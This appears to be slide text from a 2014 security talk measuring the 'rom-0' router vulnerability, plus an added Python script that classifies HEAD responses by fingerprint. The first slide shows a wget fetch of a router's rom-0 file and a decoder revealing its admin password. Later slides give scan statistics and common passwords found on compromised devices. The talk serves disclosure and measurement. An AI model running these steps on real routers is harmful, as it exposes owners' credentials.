Impact of "rom-0" vulnerability
“rom-0” vulnerability
$ wget http://192.168.1.1/rom-0
Connecting to 192.168.1.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16384 (16K) [application/octet-stream]
2014-05-20 16:58:18 (138 KB/s) - ‘rom-0’ saved [16384/16384]
$ ./RomDecoder rom-0
password: SuperSecretPassword
Which one is vulnerable?
Which one is vulnerable?
● Web based test
● http://rom-0.cz
● Scan of the Internet: HTTP HEAD /rom-0
● Recognition:
● Status code: 200
● Content-length: 16384
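The recognition rule above (status 200 and Content-Length 16384 on a HEAD request for /rom-0) can be applied offline to HEAD responses collected from devices you administer. This is an added example, not code from the slides; the function names, the result labels and the sample responses are constructed for illustration.

```python
ROM0_LENGTH = 16384  # Content-Length from the slide's recognition rule


def parse_head_response(raw: bytes):
    """Split a raw HTTP response head into (status_code, lowercase headers)."""
    lines = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(None, 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError("not an HTTP status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # header names are case-insensitive
            headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers


def classify_rom0(raw: bytes) -> str:
    """Classify one HEAD /rom-0 response (labels are this example's own)."""
    try:
        status, headers = parse_head_response(raw)
    except ValueError:
        return "unparseable"
    if status in (401, 403):
        return "auth-required"      # file is not served anonymously
    if status != 200:
        return "no-match"
    length = headers.get("content-length", "")
    if length.isdigit() and int(length) == ROM0_LENGTH:
        return "fingerprint-match"  # candidate only; confirm on the device
    return "inconclusive"           # 200 with another length, e.g. a catch-all page


# Constructed sample responses keyed by hypothetical inventory names.
SAMPLES = {
    "router-a": b"HTTP/1.1 200 OK\r\ncontent-length: 16384\r\n\r\n",
    "router-b": b"HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Basic\r\n\r\n",
    "router-c": b"HTTP/1.0 404 Not Found\r\n\r\n",
    "web-d": b"HTTP/1.1 200 OK\r\nContent-Length: 512\r\n\r\n",
    "junk-e": b"\x00\x01garbage",
}


def audit(samples):
    """Return {device: classification} for every captured response."""
    return {name: classify_rom0(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for device, verdict in audit(SAMPLES).items():
        print(f"{device}: {verdict}")
```

A fingerprint match is a candidate rather than proof: the analysis slide reports that over 90% of matching hosts were really vulnerable, so a match still needs confirming on the device itself.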
Results (May 2014)
● First scan: May 17-18 2014
● ~71M HTTP servers tested
● 1 219 985 vulnerable
● Czech Republic: 5 368
● Top in EU: Italy (116 731), Poland (22 702)
● Top in the world: Thailand (167 505), Colombia (139 976)
Analysis
● How many are really vulnerable: Over 90%
● Already hacked: At least 30% (but likely all of them)
● Most common passwords:
● PortablePwned
● ][p}{P][p---
● .corporacion
● 263297
World map (05-10/2014)
Thailand (no. 1; 100% = 167505)
Colombia (no. 2; 100% = 139976)
Italy (no. 3; 100% = 116731)
Czech Republic (100% = 5368)